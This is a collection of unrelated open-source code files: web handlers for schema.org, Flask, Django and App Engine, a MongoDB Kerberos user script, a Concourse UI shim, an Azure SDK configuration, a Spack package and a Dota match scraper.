log.info("Full release page for: node: '%s' cleannode: '%s' requested_version: '%s' requested_format: '%s' l: %s" % (node, clean_node, requested_version, requested_format, len(clean_node.rsplit('/')) ) )
# Full release page for: node: 'version/' cleannode: 'version/' requested_version: '' requested_format: '' l: 2
# /version/
if (clean_node=="version/" or clean_node=="version") and requested_version=="" and requested_format=="":
log.info("Table of contents should be sent instead, then succeed.")
if DataCache.get('tocVersionPage'):
self.response.out.write( DataCache.get('tocVersionPage'))
return True
else:
template = JINJA_ENVIRONMENT.get_template('tocVersionPage.tpl')
page = template.render({ "releases": releaselog.keys(),
"menu_sel": "Schemas",
"sitename": sitename})
self.response.out.write( page )
log.debug("Serving fresh tocVersionPage.")
DataCache.put("tocVersionPage",page)
return True
if requested_version in releaselog:
log.info("Version '%s' was released on %s. Serving from filesystem." % ( node, releaselog[requested_version] ))
version_rdfa = "data/releases/%s/schema.rdfa" % requested_version
version_allhtml = "data/releases/%s/schema-all.html" % requested_version
version_nt = "data/releases/%s/schema.nt" % requested_version
if requested_format=="":
self.response.out.write( open(version_allhtml, 'r').read() )
return True
# log.info("Skipping filesystem for now.")
if requested_format=="schema.rdfa":
self.response.headers['Content-Type'] = "application/octet-stream" # It is HTML but ... not really.
self.response.headers['Content-Disposition']= "attachment; filename=schemaorg_%s.rdfa.html" % requested_version
self.response.out.write( open(version_rdfa, 'r').read() )
return True
if requested_format=="schema.nt":
self.response.headers['Content-Type'] = "application/n-triples" # It is HTML but ... not really.
self.response.headers['Content-Disposition']= "attachment; filename=schemaorg_%s.rdfa.nt" % requested_version
self.response.out.write( open(version_nt, 'r').read() )
return True
if requested_format != "":
return False # Turtle, csv etc.
else:
log.info("Unreleased version requested. We only understand requests for latest if unreleased.")
if requested_version != "latest":
return False
log.info("giving up to 404.")
else:
log.info("generating a live view of this latest release.")
if DataCache.get('FullReleasePage'):
self.response.out.write( DataCache.get('FullReleasePage') )
log.debug("Serving recycled FullReleasePage.")
return True
else:
template = JINJA_ENVIRONMENT.get_template('fullReleasePage.tpl')
mainroot = TypeHierarchyTree()
mainroot.traverseForHTML(Unit.GetUnit("Thing"), hashorslash="#term_", layers=layerlist)
thing_tree = mainroot.toHTML()
base_href = "/version/%s/" % requested_version
az_types = GetAllTypes()
az_types.sort( key=lambda u: u.id)
az_type_meta = {}
az_props = GetAllProperties()
az_props.sort( key = lambda u: u.id)
az_prop_meta = {}
#TODO: ClassProperties (self, cl, subclass=False, layers="core", out=None, hashorslash="/"):
# TYPES
for t in az_types:
props4type = HTMLOutput() # properties applicable for a type
props2type = HTMLOutput() # properties that go into a type
self.emitSimplePropertiesPerType(t, out=props4type, hashorslash="#term_" )
self.emitSimplePropertiesIntoType(t, out=props2type, hashorslash="#term_" )
#self.ClassProperties(t, out=typeInfo, hashorslash="#term_" )
tcmt = Markup(GetComment(t))
az_type_meta[t]={}
az_type_meta[t]['comment'] = tcmt
az_type_meta[t]['props4type'] = props4type.toHTML()
az_type_meta[t]['props2type'] = props2type.toHTML()
# PROPERTIES
for pt in az_props:
attrInfo = HTMLOutput()
rangeList = HTMLOutput()
domainList = HTMLOutput()
# self.emitAttributeProperties(pt, out=attrInfo, hashorslash="#term_" )
# self.emitSimpleAttributeProperties(pt, out=rangedomainInfo, hashorslash="#term_" )
self.emitRangeTypesForProperty(pt, out=rangeList, hashorslash="#term_" )
self.emitDomainTypesForProperty(pt, out=domainList, hashorslash="#term_" )
cmt = Markup(GetComment(pt))
az_prop_meta[pt] = {}
az_prop_meta[pt]['comment'] = cmt
az_prop_meta[pt]['attrinfo'] = attrInfo.toHTML()
az_prop_meta[pt]['rangelist'] = rangeList.toHTML()
az_prop_meta[pt]['domainlist'] = domainList.toHTML()
page = template.render({ "base_href": base_href, 'thing_tree': thing_tree,
'liveversion': SCHEMA_VERSION,
'requested_version': requested_version,
'releasedate': releaselog[str(SCHEMA_VERSION)],
'az_props': az_props, 'az_types': az_types,
'az_prop_meta': az_prop_meta, 'az_type_meta': az_type_meta,
'sitename': sitename,
'menu_sel': "Documentation"})
self.response.out.write( page )
log.debug("Serving fresh FullReleasePage.")
DataCache.put("FullReleasePage",page)
return True
def setupHostinfo(self, node, test=""):
global debugging, host_ext, myhost, myport, mybasehost
hostString = test
if test == "":
hostString = self.request.host
host_ext = re.match( r'([\w\-_]+)[\.:]?', hostString).group(1)
log.debug("setupHostinfo: srh=%s host_ext2=%s" % (hostString, str(host_ext) ))
split = hostString.rsplit(':')
myhost = split[0]
mybasehost = myhost
myport = "80"
if len(split) > 1:
myport = split[1]
if host_ext != None:
# e.g. "bib"
log.debug("HOST: Found %s in %s" % ( host_ext, hostString ))
if host_ext == "www":
# www is special case that cannot be an extension - need to redirect to basehost
mybasehost = mybasehost[4:]
return self.redirectToBase(node)
elif not host_ext in ENABLED_EXTENSIONS:
host_ext = ""
else:
mybasehost = mybasehost[len(host_ext) + 1:]
dcn = host_ext
if dcn == None or dcn == "" or dcn =="core":
dcn = "core"
log.debug("sdoapp.py setting current datacache to: %s " % dcn)
DataCache.setCurrent(dcn)
debugging = False
if "localhost" in hostString or "sdo-ganymede.appspot.com" in hostString:
debugging = True
return True
def redirectToBase(self,node=""):
uri = makeUrl("",node)
self.response = webapp2.redirect(uri, True, 301)
log.info("Redirecting [301] to: %s" % uri)
return False
def get(self, node):
"""Get a schema.org site page generated for this node/term.
Web content is written directly via self.response.
CORS enabled all URLs - we assume site entirely public.
See http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
These should give a JSON version of schema.org:
curl --verbose -H "Accept: application/ld+json" http://localhost:8080/docs/jsonldcontext.json
curl --verbose -H "Accept: application/ld+json" http://localhost:8080/docs/jsonldcontext.json.txt
curl --verbose -H "Accept: application/ld+json" http://localhost:8080/
Per-term pages vary for type, property and enumeration.
Last resort is a 404 error if we do not exactly match a term's id.
See also https://webapp-improved.appspot.com/guide/request.html#guide-request
"""
global debugging, host_ext, myhost, myport, mybasehost, sitename
if not self.setupHostinfo(node):
return
self.emitHTTPHeaders(node)
if self.handleHTTPRedirection(node):
return
if (node in silent_skip_list):
return
if ENABLE_HOSTED_EXTENSIONS:
layerlist = self.setupExtensionLayerlist(node) # e.g. ['core', 'bib']
else:
layerlist = ["core"]
sitename = self.getExtendedSiteName(layerlist) # e.g. 'bib.schema.org', 'schema.org'
log.debug("EXT: set sitename to %s " % sitename)
if (node in ["", "/"]):
if self.handleHomepage(node):
return
else:
log.info("Error handling homepage: %s" % node)
return
if node in ["docs/jsonldcontext.json.txt", "docs/jsonldcontext.json"]:
if self.handleJSONContext(node):
return
else:
log.info("Error handling JSON-LD context: %s" % node)
return
if (node == "docs/full.html"): # DataCache.getDataCache.get
if self.handleFullHierarchyPage(node, layerlist=layerlist):
return
else:
log.info("Error handling full.html : %s " % node)
return
if (node == "docs/tree.jsonld" or node == "docs/tree.json"):
if self.handleJSONSchemaTree(node, layerlist=layerlist):
return
else:
log.info("Error handling JSON-LD schema tree: %s " % node)
return
if (node == "version/2.0/" or node == "version/latest/" or "version/" in node):
if self.handleFullReleasePage(node, layerlist=layerlist):
return
else:
log.info("Error handling full release page: %s " % node)
if self.handle404Failure(node):
return
else:
log.info("Error handling 404 under /version/")
return
# Pages based on request path matching a Unit in the term graph:
if self.handleExactTermPage(node, layers=layerlist):
return
else:
log.info("Error handling exact term page. Assuming a 404: %s" % node)
# Drop through to 404 as default exit.
if self.handle404Failure(node):
return
else:
log.info("Error handling 404.")
return
def getHostExt():
return host_ext
def getBaseHost():
return mybasehost
def getHostPort():
return myport
def makeUrl(ext="",path=""):
port = ""
sub = ""
p = ""
if(getHostPort() != "80"):
port = ":%s" % getHostPort()
if ext != "core" and ext != "":
sub = "%s." % ext
if path != "":
if path.startswith("/"):
p = path
else:
p = "/%s" % path
url = "http://%s%s%s%s" % (sub,getBaseHost(),port,p)
return url
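# Example outputs (added for illustration; hostnames assume the public deployment):
# makeUrl("bib", "Book") -> "http://bib.schema.org/Book" when the base host is
# schema.org and the port is 80; makeUrl("", "docs/full.html") omits the subdomain
# and yields "http://schema.org/docs/full.html".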
#log.info("STARTING UP... reading schemas.")
read_schemas(loadExtensions=ENABLE_HOSTED_EXTENSIONS)
if ENABLE_HOSTED_EXTENSIONS:
read_extensions(ENABLED_EXTENSIONS)
schemasInitialized = True
app = ndb.toplevel(webapp2.WSGIApplication([("/(.*)", ShowUnit)]))
| cesarmarinhorj/schemaorg | sdoapp.py | Python | apache-2.0 | 67,019 |
# coding: utf-8
from flask import render_template, Blueprint
bp = Blueprint('site', __name__)
@bp.route('/')
def index():
"""Index page."""
return render_template('site/index/index.html')
@bp.route('/about')
def about():
"""About page."""
return render_template('site/about/about.html')
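# Usage sketch (an assumption, not part of this file): the blueprint is typically
# registered on the app in the application factory, e.g.
#   from application.controllers import site
#   app.register_blueprint(site.bp)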
| hustlzp/Flask-Boost | flask_boost/project/application/controllers/site.py | Python | mit | 308 |
#!/usr/bin/python
import pexpect, argparse, kadmin, ktutil
from subprocess import check_output
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='''
This script creates a new mongo user with a kerberos principal
''')
parser.add_argument('-n', '--principalName', default=None, help='Principal name')
parser.add_argument('-d', '--database', default='test', help='Mongo Db')
parser.add_argument('-r', '--roles', default='read', help='Comma separated list of roles')
parser.add_argument('-p', '--password', default=None, help='Password')
parser.add_argument('-k', '--keytab', default=None, help='Keytab name (optional)')
args = parser.parse_args()
domain = str(check_output("grep default_realm /etc/krb5.conf | awk '{print $NF}'", shell=True)).strip()
roles = ','.join([ '"' + role + '"' for role in args.roles.split(',') ])
kadmin.kadmin('addprinc ' + args.principalName, args.password)
print str(check_output(['/mongodb/bin/mongo', '--eval', 'db = db.getSiblingDB("' + args.database + '"); db.system.users.remove( { user: "' + args.principalName + '@' + domain + '" } ); db.addUser( { "user": "' + args.principalName + '@' + domain + '", "roles": [' + roles + '], "userSource": "$external" } )']))
if args.keytab is not None:
ktutil.ktutil(['addent -password -p ' + args.principalName + '@' + domain + ' -k 1 -e aes256-cts', 'wkt ' + args.keytab], [args.password])
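# Example invocation (illustrative; principal, database and roles are made-up values):
#   python createUser.py -n alice -d analytics -r read,readWrite -p S3cret -k alice.keytab
# The -k flag is optional; when given, a keytab entry is written for the new principal.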
| brosander/pentaho-docker | mongo/mongo-kerberos/createUser.py | Python | apache-2.0 | 1,416 |
from django.contrib import admin
from rango.models import Category, Page
class PageAdmin(admin.ModelAdmin):
list_display = ('title', 'category', 'url')
admin.site.register(Category)
admin.site.register(Page, PageAdmin)
| jonellalvi/tango_with_django | rango/admin.py | Python | mit | 227 |
#!/usr/bin/python3
import bottle
import networkx
import networkx.readwrite.json_graph
import json
import os
@bottle.route('/dependencies')
def dependencies():
# In reality, this has do some parsing of Plink Makefiles and
# the Debian package metadata to get a real idea of the dependencies.
pass
@bottle.route('/messagequeue-port')
def messagequeue_port():
pass
class ConcourseShim(object):
# Concourse UI can display multiple groups of pipelines. They are listed
# in a row along the top of the window. We assume there's just one group,
# for now.
_default_group = "builds"
def _pipeline(self, pipeline_name, job_names):
'''Return Concourse-compatible JSON for a single Pipeline.
A Pipeline contains multiple Jobs. I'm not really sure how
Groups fit in, but we only have 1 anyway.
'''
return dict(
name=pipeline_name,
url='/pipelines/%s' % pipeline_name,
paused=False,
groups=[
dict(
name=self._default_group,
jobs=job_names,
)
])
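# Sketch of the structure returned above (illustrative; the job names are assumptions):
# {
#   "name": "main",
#   "url": "/pipelines/main",
#   "paused": False,
#   "groups": [{"name": "builds", "jobs": ["compile", "package"]}]
# }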
def _job(self, pipeline_name, job_name, dependee_jobs):
'''Return Concourse-compatible JSON for a single Job instance.
A Job (or task) is some work that needs to be done. Compiling some
source code is a Job, for example.
'''
def source_resource():
return dict(name="input", resource="input")
def output_resource(input_names):
if len(input_names) > 0:
return dict(name="output", resource="output", passed=input_names)
else:
return dict(name="output", resource="output")
inputs = [source_resource()]
if dependee_jobs:
inputs.append(output_resource(dependee_jobs))
return dict(
name=job_name,
url='/pipelines/%s/jobs/%s' % (pipeline_name, job_name),
next_build=None,
finished_build=None,
inputs=inputs,
outputs=[output_resource([])],
groups=[self._default_group]
)
def _resource(self, pipeline_name, resource_name, resource_type):
'''Return Concourse-compatible JSON for a single Resource instance.
A Resource is a generic input or output thing, such as a Git repository
that provides source code, or a package repository that contains build
output.
When using only the UI of Concourse, resources aren't that interesting.
'''
return dict(
name=resource_name,
type=resource_type,
groups=[],
url="/pipelines/%s/resources/%s" % (pipeline_name, resource_name),
)
def pipelines(self):
# Return a single pipeline called "main", containing all jobs.
nodes = self.build_graph.nodes(data=True)
all_job_names = [node_data['name'] for node_id, node_data in nodes]
pipeline = self._pipeline("main", all_job_names)
return json.dumps(pipeline)
def pipeline_jobs(self, pipeline):
# List all the jobs we know about.
jobs = []
for job_node_id, job_node_data in self.build_graph.nodes(data=True):
job_name = job_node_data['name']
# sorry
input_edges = self.build_graph.in_edges(job_node_id)
input_node_ids = [edge[0] for edge in input_edges]
input_job_names = [self.build_graph.node[i]['name'] for i in
input_node_ids]
job = self._job(pipeline, job_name, input_job_names)
jobs.append(job)
return json.dumps(jobs)
def pipeline_resources(self, pipeline):
resources = [self._resource(pipeline, name, type)
for name, type in
[("input", "git"), ("output", "github-release")]]
return json.dumps(resources)
def __init__(self, build_graph_node_link_data):
self.build_graph = networkx.readwrite.json_graph.node_link_graph(
build_graph_node_link_data)
self.app = bottle.Bottle()
self.app.route('/pipelines')(self.pipelines)
self.app.route('/pipelines/<pipeline>/jobs')(self.pipeline_jobs)
self.app.route('/pipelines/<pipeline>/resources')(self.pipeline_resources)
def main():
GRAPH = 'build-graph.json'
HOST = os.environ.get('HOST', '0.0.0.0')
PORT = os.environ.get('PORT', 8080)
with open(GRAPH) as f:
build_graph = json.load(f)
concourse_shim = ConcourseShim(build_graph)
# API requests under /api/v1/ go to the Concourse shim
root = bottle.Bottle()
root.mount('/api/v1', concourse_shim.app)
# Avoid 404 errors in these cases.
@root.route('/')
@root.route('/demo')
@root.route('/demo/')
def index_redirect():
return bottle.redirect('/demo/index.html')
# Everything else is treated as a file path, in the parent directory
# (so we can get at Concourse ATC's files inside the ../atc/ submodule).
@root.route('/<filepath:path>')
def serve_file(filepath):
return bottle.static_file(filepath, root='..')
bottle.run(root, host=HOST, port=PORT)
main()
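# Example run (illustrative): with build-graph.json present and the ../atc submodule
# checked out, `PORT=9090 python3 server.py` serves the shimmed Concourse API at
# http://0.0.0.0:9090/api/v1/pipelines and the static UI files from the parent directory.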
| ssssam/generic-concourse-ui | demo/server.py | Python | apache-2.0 | 5,271 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
from .._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class DevTestLabsClientConfiguration(Configuration):
"""Configuration for DevTestLabsClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The subscription ID.
:type subscription_id: str
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
**kwargs: Any
) -> None:
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
super(DevTestLabsClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.subscription_id = subscription_id
self.api_version = "2018-09-15"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-devtestlabs/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs: Any
) -> None:
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.AsyncBearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
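# Minimal usage sketch (added; credential handling is an assumption, and in practice
# this configuration object is built for you by DevTestLabsClient):
#   from azure.identity.aio import DefaultAzureCredential
#   config = DevTestLabsClientConfiguration(DefaultAzureCredential(), "<subscription-id>")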
| Azure/azure-sdk-for-python | sdk/devtestlabs/azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/aio/_configuration.py | Python | mit | 3,186 |
# -*- coding: utf-8 -*-
"""
Define the global constants for the problem.
"""
import math
import os
q = 0.5
b0 = 0.9
omegad = 2.0 / 3.0
l = 9.8
m = 1.0
g = 9.8
tmax = 1000
theta0_degree = 25.0
theta0 = math.radians(theta0_degree)
dt = 0.05
bstep = 0.05
path = "plots/"
os.system("pause")
| NicovincX2/Python-3.5 | Statistiques/Économétrie/Série temporelle/Damped-driven pendulum/tsa_constants.py | Python | gpl-3.0 | 299 |
# indent with 4 spaces (most editors can be set to
# put 4 spaces when hitting tab)
# if something is unclear, see
# http://wiki.ros.org/PyStyleGuide
# and
# http://legacy.python.org/dev/peps/pep-0008
# it's recommended to check that the code follows
# pep8 formatting with a linter.
# see http://legacy.python.org/dev/peps/pep-0257/
# for questions on documentation
# file has the same name as the class + .py
# each class has its own file.
#######
# NOTE:
# THIS CLASS IS COMPLETELY MISSING THE DOCUMENTATION
# GUIDLINE, TO BE ADDED SOON
#######
class SomeClass(object):
"""
This is the description for the class
Attributes: #only public attributes
* size(int): the size
"""
def __init__(self):
"""
init method
"""
super(SomeClass, self).__init__()
# a public attribute
self.size = 100
# called "non-public" in python;
# equivalent to private in other languages
self.__password = "im private"
# _ as suffix stands for a protected attribute
self._username = "im protected"
# public attribute another_attribute
# with the python version of getters and
# setters.
# access is my_some_class.another_attribute = 20
# note that the attribute definition is with an
# underscore.
# only use this way of defining the attribute
# if the property or setter method really does
# something.
self._another_attribute = 20
@property
def another_attribute(self):
return self._another_attribute
@another_attribute.setter
def another_attribute(self, value):
"""
example method with random text :)
:param value: The data to be published
:type value: RatedStatistics
:returns: MetadataStorageResponse
:raise ValueError: If the key is null or empty.
"""
if value > 40:
value = 40
self._another_attribute = value
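# Usage sketch (added example, not in the original guideline file):
#   obj = SomeClass()
#   obj.another_attribute = 55   # the setter clamps values above 40
#   print(obj.another_attribute) # -> 40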
# if the parameters are too long, put them on new lines
# after the opening bracket. indent once.
def long_method_name(
self, var1, var2, var3,
var4, some_really_long_parameter):
pass
def _im_a_protected_method(self):
pass
def __im_a_private_method(self, arg1, arg2):
pass
@staticmethod
def i_am_a_function():
pass
| andreasBihlmaier/arni | code-examples/SomeClass.py | Python | bsd-2-clause | 2,386 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf.urls import url, include
from rest_framework import routers
from shop.forms.checkout import ShippingAddressForm, BillingAddressForm
from shop.views.address import AddressEditView
from shop.views.cart import CartViewSet, WatchViewSet
from shop.views.checkout import CheckoutViewSet
from shop.views.catalog import ProductSelectView
router = routers.DefaultRouter() # TODO: try with trailing_slash=False
router.register(r'cart', CartViewSet, base_name='cart')
router.register(r'watch', WatchViewSet, base_name='watch')
router.register(r'checkout', CheckoutViewSet, base_name='checkout')
urlpatterns = [
url(r'^select_product/?$',
ProductSelectView.as_view(),
name='select-product'),
url(r'^shipping_address/(?P<priority>({{\s*\w+\s*}}|\d+|add))$',
AddressEditView.as_view(form_class=ShippingAddressForm),
name='edit-shipping-address'),
url(r'^billing_address/(?P<priority>({{\s*\w+\s*}}|\d+|add))$',
AddressEditView.as_view(form_class=BillingAddressForm),
name='edit-billing-address'),
url(r'^', include(router.urls)),
]
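# Illustrative note (an inference from the registrations above, not original text):
# the DefaultRouter exposes viewset endpoints such as cart/, watch/ and checkout/,
# while the explicit url() patterns add select-product and the two address edit views.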
| nimbis/django-shop | shop/urls/rest_api.py | Python | bsd-3-clause | 1,168 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Miniforge3(Package):
"""Miniforge3 is a minimal installer for conda specific to conda-forge."""
homepage = "https://github.com/conda-forge/miniforge"
url = "https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-Linux-x86_64.sh"
version('4.8.3-4-Linux-x86_64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-4/Miniforge3-4.8.3-4-Linux-x86_64.sh',
sha256='24951262a126582f5f2e1cf82c9cd0fa20e936ef3309fdb8397175f29e647646',
expand=False)
version('4.8.3-4-Linux-aarch64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-4/Miniforge3-4.8.3-4-Linux-aarch64.sh',
sha256='52a8dde14ecfb633800a2de26543a78315058e30f5883701da1ad2f2d5ba9ed8',
expand=False)
version('4.8.3-2-Linux-x86_64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-Linux-x86_64.sh',
sha256='c8e5b894fe91ce0f86e61065d2247346af107f8d53de0ad89ec848701c4ec1f9',
expand=False)
version('4.8.3-2-Linux-aarch64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-Linux-aarch64.sh',
sha256='bfefc0ede6354568978b4198607edd7f17c2f50ca4c6a47e9f22f8c257c8230a',
expand=False)
version('4.8.3-2-MacOSX-x86_64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-MacOSX-x86_64.sh',
sha256='25ca082ab00a776db356f9bbc660edf6d24659e2aec1cbec5fd4ce992d4d193d',
expand=False)
def install(self, spec, prefix):
mkdirp(prefix)
pkgname = 'Miniforge3-{0}.sh'.format(self.version)
chmod = which('chmod')
chmod('+x', pkgname)
sh = which('sh')
sh('./{0}'.format(pkgname), '-b', '-f', '-s', '-p', prefix)
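    # Example invocations (illustrative, not part of the package recipe):
    #   spack install miniforge3
    #   spack install miniforge3@4.8.3-4-Linux-aarch64
    # The version string selects the matching prebuilt installer script.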
| LLNL/spack | var/spack/repos/builtin/packages/miniforge3/package.py | Python | lgpl-2.1 | 2,134 |
# -*- coding: utf-8 -*-
import os
import re
import json
import pathlib
from lxml import html
from dota import api
from dota.helpers import cached_games
def fetch_new_match_ids(match_ids_path):
"""
Get new match ids from datdota.
Parameters
----------
match_ids_path : path to a text file of match ids already cached.
Returns
-------
new_ids : [str]
Notes
-----
Each line of the file at match_ids_path should look like '578918710\n'
"""
url = "http://www.datdota.com/matches.php"
r = html.parse(url).getroot()
reg = re.compile(r'match.*(\d{9})$')
links = filter(lambda x: reg.match(x[2]), r.iterlinks())
with match_ids_path.open() as f:
old_ids = f.readlines()
ids = (x[2].split('?q=')[-1] + '\n' for x in links)
new_ids = [x for x in ids if x not in old_ids]
return new_ids
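# Example (illustrative, values made up): if pro_match_ids.txt already contains
# '578918710\n', only ids scraped from datdota that are not in the file are returned,
# each with a trailing newline, e.g. ['578920001\n', '578920420\n'].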
def get_new_details(match_ids, data_path):
with open(os.path.expanduser('~/') + 'Dropbox/bin/api-keys.txt') as f:
key = json.load(f)['steam']
h = api.API(key=key)
cached = [int(x.stem) for x in cached_games(data_path)] # fragile...
new_matches = (x for x in match_ids if int(x) not in cached)
details = {mid: h.get_match_details(mid) for mid in new_matches}
return details
def write_new_details(details, data_path):
if not data_path.exists():
data_path.mkdir()
for k in details:
with (data_path / (str(k) + '.json')).open('w') as f:
json.dump(details[k].resp, f)
def get_pro_matches(id_store='pro_match_ids.txt',
data_path='~/sandbox/dota/data/pro/'):
"""
Find new match ids
Parameters
----------
id_store : str
data_path : str
"""
id_store = pathlib.Path(id_store)
data_path = pathlib.Path(os.path.expanduser(data_path))
match_ids_path = data_path / id_store
new_ids = fetch_new_match_ids(match_ids_path)
print("New matches found: {}".format(new_ids))
#--------------------------------------------------------------------------
# Write new ids and update match_ids by reading
with match_ids_path.open('a+') as f:
f.writelines(new_ids)
with match_ids_path.open() as f:
match_ids = [x.strip() for x in f.readlines()]
#--------------------------------------------------------------------------
# Get Match Details for new matches
details = get_new_details(match_ids, data_path)
write_new_details(details, data_path)
#--------------------------------------------------------------------------
# Insert into pro.db
from dota.sql.orm import update_db
update_db(data_path)
print("Added {}".format(new_ids))
if __name__ == '__main__':
# TODO: add argparser for id_store and data_path
get_pro_matches()
| TomAugspurger/dota | dota/scripts/get_pro_matches.py | Python | mit | 2,765 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import os
import time
import datetime
import string
import random
import re
from google.appengine.api import mail
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import webapp2
from Crypto.Hash import SHA256
import myapp
from models import *
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__) + '/../templates/'),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class MainHandler(webapp2.RequestHandler):
__locked = True
__grace_locked = True
def dispatch(self):
self.__locked = myapp.time_locked(11, 18, 5)
self.__grace_locked = myapp.time_locked(11, 18, 7)
super(MainHandler, self).dispatch()
def render_form(self, grants_application, errors={}):
learning_associations = LearningAssociation.query().order(LearningAssociation.name).fetch(50)
while (len(grants_application.previous_grants) < 3):
grants_application.previous_grants.append(PreviousGrants())
while (len(grants_application.other_grants) < 3):
grants_application.other_grants.append(OtherGrants())
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_associations': learning_associations,
'grants_application': grants_application,
'errors': errors,
'is_locked': self.__locked
}
template = JINJA_ENVIRONMENT.get_template('application_form.html')
self.response.write(template.render(template_values))
def enum_params(self, class_name, params, target):
classes = {
'previous_grants': PreviousGrants,
'other_grants': OtherGrants
}
for i, item in enumerate(self.request.POST.getall('_'.join([class_name,params[0]]))):
model = classes[class_name]()
setattr(model, params[0], item)
setattr(model, params[1], self.request.POST.getall('_'.join([class_name,params[1]]))[i])
if not model == classes[class_name]():
target.append(model)
def get(self):
grants_application = TravelGrantsApplication()
self.render_form(grants_application)
def post(self):
if self.__grace_locked:
self.abort(403)
else:
grants_application = TravelGrantsApplication(parent=ndb.Key('Year', myapp.APPLICATION_YEAR))
errors = {}
for item in ['name', 'address', 'postal_code', 'postal_city', 'phone', 'email', 'organization', 'location', 'time_span', 'expenses', 'purpose', 'study_program']:
setattr(grants_application, item, self.request.POST.get(item))
if not getattr(grants_application, item):
errors[item] = 'missing'
elif item == 'email':
if not re.match(r"[^@]+@[^@]+\.[^@]+", grants_application.email):
errors[item] = 'invalid'
grants_application.learning_association = ndb.Key(urlsafe=self.request.POST.get('learning_association'))
learning_association = grants_application.learning_association.get()
if not learning_association:
errors['learning_association'] = 'missing'
self.enum_params('previous_grants', ['year','location'], grants_application.previous_grants)
self.enum_params('other_grants', ['provider','amount'], grants_application.other_grants)
if (len(errors) > 0):
self.render_form(grants_application, errors)
else:
grants_application.sent_at = datetime.datetime.now()
grants_application.put()
application_text = myapp.application_text(grants_application)
mail.send_mail(sender="Voksenopplæringsforbundet <vofo@vofo.no>",
to="%s <%s>" % (learning_association.name, learning_association.email),
subject="Reisestipendsøknad fra %s" % (grants_application.name),
body="""
Hei
Det har kommet en ny søknad om reisestipend til deres studieforbund.
Søknaden er fra %s (%s) og gjelder studiereise til %s i tidsrommet %s.
Gå til %sprioriter for å lese og prioritere søknader fra deres studieforbund.
Husk at fristen for å prioritere søknader er 28. november.
--
Hilsen Voksenopplæringsforbundet
""" % (grants_application.name,
grants_application.organization,
grants_application.location,
grants_application.time_span,
myapp.APPLICATION_URL))
mail.send_mail(sender="Voksenopplæringsforbundet <vofo@vofo.no>",
to="%s <%s>" % (grants_application.name, grants_application.email),
subject="Reisestipendsøknad til %s" % (learning_association.name),
body="""
Hei %s
Du har sendt søknad om reisestipend til %s.
%s
Ta kontakt med studieforbundet på %s hvis du har spørsmål.
--
Hilsen Voksenopplæringsforbundet
""" % (grants_application.name, grants_application.learning_association_name, application_text, learning_association.email))
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'grants_application': grants_application,
'learning_association': learning_association
}
template = JINJA_ENVIRONMENT.get_template('hooray.html')
self.response.write(template.render(template_values))
class AdminHandler(webapp2.RequestHandler):
def dispatch(self):
"""This handler requires the current_user to be admin."""
if users.is_current_user_admin():
super(AdminHandler, self).dispatch()
else:
if users.get_current_user():
self.abort(403)
else:
self.redirect(users.create_login_url(self.request.uri))
def get_params(self):
return (self.request.get('sf') == 'new'), (self.request.get('sf').isdigit() and int(self.request.get('sf')) or self.request.get('sf'))
def get(self):
if self.request.get('sf'):
is_new, sf_id = self.get_params()
learning_association = is_new and LearningAssociation() or LearningAssociation.get_by_id(sf_id)
learning_associations = None
else:
learning_association = None
learning_associations = LearningAssociation.query().order(LearningAssociation.name).fetch(50)
template_values = {
